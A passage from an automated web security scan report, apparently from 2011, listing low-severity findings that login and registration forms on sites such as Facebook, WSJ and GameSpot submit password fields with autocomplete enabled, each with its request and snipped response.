HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977 <!DOCTYPE html> <html lang="en_US" class="ui-widget-content" <head> <title>jQuery Form Plugin</title> <link rel="stylesheet" href="http://ajax ...[SNIP]... </pre> <form id="myForm2" action="dummy2.php" method="post"><div> ...[SNIP]... <td><input name="Password" type="password" /></td> ...[SNIP]... |
11.7. http://malsup.com/jquery/form/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://malsup.com |
Path: | /jquery/form/ |
Issue detail
The page contains a form with the following action URL:- http://malsup.com/jquery
/form/dummy.php
- password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977 <!DOCTYPE html> <html lang="en_US" class="ui-widget-content" <head> <title>jQuery Form Plugin</title> <link rel="stylesheet" href="http://ajax ...[SNIP]... </h3> <form id="validateForm3" action="dummy.php" method="post"><div> ...[SNIP]... <input type="text" name="username" /> Password: <input type="password" name="password" /> <input type="submit" value="Submit" /> ...[SNIP]... |
11.8. http://malsup.com/jquery/form/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://malsup.com |
Path: | /jquery/form/ |
Issue detail
The page contains a form with the following action URL:- http://malsup.com/jquery
/form/dummy.php
- password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977 <!DOCTYPE html> <html lang="en_US" class="ui-widget-content" <head> <title>jQuery Form Plugin</title> <link rel="stylesheet" href="http://ajax ...[SNIP]... </h3> <form id="validateForm2" action="dummy.php" method="post"><div> ...[SNIP]... <input type="text" name="username" /> Password: <input type="password" name="password" /> <input type="submit" value="Submit" /> ...[SNIP]... |
11.9. http://malsup.com/jquery/form/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://malsup.com |
Path: | /jquery/form/ |
Issue detail
The page contains a form with the following action URL:- http://malsup.com/jquery
/form/dummy.php
- Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977 <!DOCTYPE html> <html lang="en_US" class="ui-widget-content" <head> <title>jQuery Form Plugin</title> <link rel="stylesheet" href="http://ajax ...[SNIP]... <br /> <form id="test" action="dummy.php" method="post"><div> ...[SNIP]... <td><input name="Password" type="password" value="" /></td> ...[SNIP]... |
11.10. http://malsup.com/jquery/form/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://malsup.com |
Path: | /jquery/form/ |
Issue detail
The page contains a form with the following action URL:- http://malsup.com/jquery
/form/dummy.php
- password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977 <!DOCTYPE html> <html lang="en_US" class="ui-widget-content" <head> <title>jQuery Form Plugin</title> <link rel="stylesheet" href="http://ajax ...[SNIP]... </h3> <form id="validateForm1" action="dummy.php" method="post"><div> ...[SNIP]... <input type="text" name="username" /> Password: <input type="password" name="password" /> <input type="submit" value="Submit" /> ...[SNIP]... |
11.11. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://online.wsj.com |
Path: | /article/SB100014240 |
Issue detail
The page contains a form with the following action URL:- http://online.wsj.com
/article/SB100014240 52748704415104576066 830729058232.html
- passwordReg
- passwordConfirmationReg
Request
GET /article/SB100014240 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </div> <form name="freeRegistration <ul class="regForms"> ...[SNIP]... </label> <input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" /> </div> ...[SNIP]... </label> <input type="password" name="passwordConfir </div> ...[SNIP]... |
11.12. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://online.wsj.com |
Path: | /article/SB100014240 |
Issue detail
The page contains a form with the following action URL:- http://commerce.wsj.com
/auth/submitlogin
- password
Request
GET /article/SB100014240 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </h4> <form action="http://commerce <fieldset> ...[SNIP]... </label> <input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/> <input type="hidden" name="url" id="page_url" value=""/> ...[SNIP]... |
11.13. http://themeforest.net/user/freshface/portfolio previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://themeforest.net |
Path: | /user/freshface/portfolio |
Issue detail
The page contains a form with the following action URL:- http://themeforest.net
/signin/authenticate
- password
Request
GET /user/freshface/portfolio HTTP/1.1 Host: themeforest.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Sun, 09 Jan 2011 02:28:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "7d3f05bdfbd104cc41c X-Runtime: 174 Content-Length: 34838 Set-Cookie: referring_user=-1; domain=.themeforest.net; path=/; expires=Sat, 09-Apr-2011 03:28:47 GMT Set-Cookie: _fd_session=BAh7BzoU Cache-Control: private, max-age=0, must-revalidate <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link href="h ...[SNIP]... <div id="user-bar"> <form action="/signin <a href="/signup" class="sprite input-link-dark"> ...[SNIP]... <input id="username" name="username" type="text" class="signinbar-input" value="username" onclick="this.value = ''"/> <input id="password" name="password" type="password" class="signinbar-input" value="123456" onfocus="this.value = ''" onclick="this.value = ''"/> <button class="submit-button-dark ...[SNIP]... |
11.14. http://wordpress.org/extend/plugins/wp-pagenavi/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://wordpress.org |
Path: | /extend/plugins/wp |
Issue detail
The page contains a form with the following action URL:- http://wordpress.org
/extend/plugins/bb-login .php
- password
Request
GET /extend/plugins/wp Host: wordpress.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 09 Jan 2011 02:29:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Content-Length: 23436 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </h2> <form class="login" method="post" action="http://wordpress <p> ...[SNIP]... <label>Password <input class="text" name="password" type="password" id="password" size="13" maxlength="40" /> </label> ...[SNIP]... |
11.15. http://www.43things.com/person/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.43things.com |
Path: | /person/ |
Issue detail
The page contains a form with the following action URL:- http://www.43things.com
/auth/login
- person[password]
Request
GET /person/ HTTP/1.1 Host: www.43things.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 01:38:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4 X-Runtime: 0.00959 Cache-Control: no-cache Set-Cookie: ubid=ShCp%2FqO8Bd Set-Cookie: auth=Zaocciefe2iud12 Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _session_id=c7e240c8 Content-Length: 13687 Status: 404 Not Found Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:38:28 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>43 Things</title> <m ...[SNIP]... </div> <form name="existingAccount" action="/auth/login" method="post" onsubmit="new Ajax.Updater('overlay', '/auth/loginjs', {asynchronous:true, evalScripts:true, onLoading:function <table class="login-form"> ...[SNIP]... <td align="left" style="background:url( ...[SNIP]... |
11.16. http://www.adbrite.com/mb/commerce/purchase_form.php previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.adbrite.com |
Path: | /mb/commerce/purchase |
Issue detail
The page contains a form with the following action URL:- https://www.adbrite.com
/mb/commerce/login.php
- pword
Request
GET /mb/commerce/purchase Host: www.adbrite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html Date: Sun, 09 Jan 2011 02:58:29 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Server: Apache Set-Cookie: ADBRITE_SESS_1=u5gs1 Set-Cookie: AB_ORIGIN=0; expires=Mon, 10-Jan-2011 02:58:29 GMT; path=/ Set-Cookie: AB_ORIGIN=0; expires=Mon, 10-Jan-2011 02:58:29 GMT; path=/ Connection: close Content-Length: 22604 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>adBrite - Advertise on Pandora</title> <meta http-equi ...[SNIP]... </ul> <form action="https://www <input type="text" name="username" title="Username" id="top-username" /><input type="password" name="pword" title="Password" id="top-pword" /> <label for="view_select_adv"> ...[SNIP]... |
11.17. http://www.adbrite.com/mb/commerce/purchase_form.php previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.adbrite.com |
Path: | /mb/commerce/purchase |
Issue detail
The page contains a form with the following action URL:- https://www.adbrite.com
/mb/commerce/login.php
- pword
Request
GET /mb/commerce/purchase Host: www.adbrite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html Date: Sun, 09 Jan 2011 02:58:29 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Server: Apache Set-Cookie: ADBRITE_SESS_1=u5gs1 Set-Cookie: AB_ORIGIN=0; expires=Mon, 10-Jan-2011 02:58:29 GMT; path=/ Set-Cookie: AB_ORIGIN=0; expires=Mon, 10-Jan-2011 02:58:29 GMT; path=/ Connection: close Content-Length: 22604 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>adBrite - Advertise on Pandora</title> <meta http-equi ...[SNIP]... <li> <form action="https://www <input type="text" name="username" title="Username" id="top-username" /> <input type="password" name="pword" title="Password" id="top-pword" /> <a href="https://www.adbrite ...[SNIP]... |
11.18. http://www.facebook.com/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | / |
Issue detail
The page contains a form with the following action URL:- https://login.facebook
.com/login.php?login _attempt=1
- pass
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=BqNeE; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F Set-Cookie: reg_fb_ref=http%3A%2F Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 29867 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div class="menu_login ...[SNIP]... <td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td> ...[SNIP]... |
11.19. http://www.facebook.com/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | / |
Issue detail
The page contains a form with the following action URL:- http://www.facebook.com/
- reg_passwd__
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=BqNeE; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F Set-Cookie: reg_fb_ref=http%3A%2F Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 29867 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){ ...[SNIP]... <div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div> ...[SNIP]... |
11.20. http://www.facebook.com/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | / |
Issue detail
The page contains a form with the following action URL:- http://www.facebook.com/
?ref=sgm
- reg_passwd__
Request
GET /?ref=sgm HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=KEXAT; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F Set-Cookie: reg_fb_ref=http%3A%2F Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:43 GMT Content-Length: 30059 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){ ...[SNIP]... <div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div> ...[SNIP]... |
11.21. http://www.facebook.com/2008/fbml previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /2008/fbml |
Issue detail
The page contains a form with the following action URL:- https://login.facebook
.com/login.php?login _attempt=1
- pass
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=zoSHS; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:15 GMT Content-Length: 11443 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div class="menu_login ...[SNIP]... <td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td> ...[SNIP]... |
11.22. http://www.facebook.com/Pogo previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /Pogo |
Issue detail
The page contains a form with the following action URL:- https://login.facebook
.com/login.php?login _attempt=1
- pass
Request
GET /Pogo HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=DGAoC; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:26 GMT Content-Length: 29798 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div class="menu_login ...[SNIP]... <td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td> ...[SNIP]... |
11.23. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817 previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /pages/Packet-Storm |
Issue detail
The page contains a form with the following action URL:- https://login.facebook
.com/login.php?login _attempt=1
- pass
Request
GET /pages/Packet-Storm Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=VcqBg; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 27755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div class="menu_login ...[SNIP]... <td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td> ...[SNIP]... |
11.24. http://www.facebook.com/peanutlabs previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /peanutlabs |
Issue detail
The page contains a form with the following action URL:- https://login.facebook
.com/login.php?login _attempt=1
- pass
Request
GET /peanutlabs HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=WrbZx; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:43 GMT Content-Length: 130584 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div class="menu_login ...[SNIP]... <td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td> ...[SNIP]... |
11.25. https://www.facebook.com/connect/uiserver.php previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | https://www.facebook.com |
Path: | /connect/uiserver.php |
Issue detail
The page contains a form with the following action URL:- https://login.facebook
.com/login.php?login _attempt=1
- pass
Request
GET /connect/uiserver.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:27:43 GMT Content-Length: 13442 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div class="menu_login ...[SNIP]... <td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td> ...[SNIP]... |
11.26. https://www.facebook.com/login.php previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | https://www.facebook.com |
Path: | /login.php |
Issue detail
The page contains a form with the following action URL:- https://login.facebook
.com/login.php?login _attempt=1
- pass
Request
GET /login.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ac4nTYEA6yNv1vk Set-Cookie: lsd=tJ98F; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F Set-Cookie: reg_fb_ref=https%3A%2F Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:27:42 GMT Content-Length: 16799 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div class="login_form ...[SNIP]... </label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div> ...[SNIP]... |
11.27. http://www.gamespot.com/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.gamespot.com |
Path: | / |
Issue detail
The page contains a form with the following action URL:- https://authorize
.gamespot.com/1324-2425-8 .html
- PASSWORD
Request
GET / HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:43:55 GMT Server: Apache Accept-Ranges: bytes X-Powered-By: PHP/5.2.5 Set-Cookie: geolocn=MTczLjE5My4y Set-Cookie: ctk=NGQyOTEyZGJhZGMx Set-Cookie: gspot_promo_010811=1; expires=Wed, 12-Jan-2011 01:43:55 GMT; path=/; domain=.gamespot.com Set-Cookie: gspot_side_010811=1; expires=Wed, 12-Jan-2011 01:43:55 GMT; path=/; domain=.gamespot.com Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com Keep-Alive: timeout=300, max=994 Connection: Keep-Alive Content-Type: text/html; charset=ISO-8859-1 Content-Length: 98766 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div class="profile"> <form id="login" name="login" method="post" action="https://authorize <fieldset> ...[SNIP]... <div class="field_wrap"> <input class="text pwd" type="password" name="PASSWORD" id="PASSWORD" tabindex="1" title="password" /> <label class="overlay off"> ...[SNIP]... |
11.28. http://www.mlive.com/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.mlive.com |
Path: | / |
Issue detail
The page contains a form with the following action URL:- http://www.mlive.com/
- password
Request
GET / HTTP/1.1 Host: www.mlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: Apache P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM' Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:44:45 GMT Date: Sun, 09 Jan 2011 01:44:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107391 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <div class="top"> <form id="ToprailSigninForm" name="ToprailSignInForm" method="post" action="" onsubmit="document <input type="hidden" name="__mode" value="do_login" /> ...[SNIP]... </label> <input type="password" id="tr_login_password" name="password" value="" class="field" size="30" /> </div> ...[SNIP]... |
11.29. http://www.onestat.com/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.onestat.com |
Path: | / |
Issue detail
The page contains a form with the following action URL:- http://www.onestat.com
/Default.aspx
- MemberLoginCompact1
$Login1$Password
Request
GET / HTTP/1.1 Host: www.onestat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 02:31:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml" X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: UILanguage=en; expires=Sat, 09-Jan-2016 02:31:56 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 19494 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> OneStat.com We ...[SNIP]... <div class="container"> <form name="form1" method="post" action="Default.aspx" id="form1"> <div> ...[SNIP]... <td><input name="MemberLoginCompact1 ...[SNIP]... |
11.30. http://www.pandora.com/login.vm previous next
Summary
Severity: | Low |
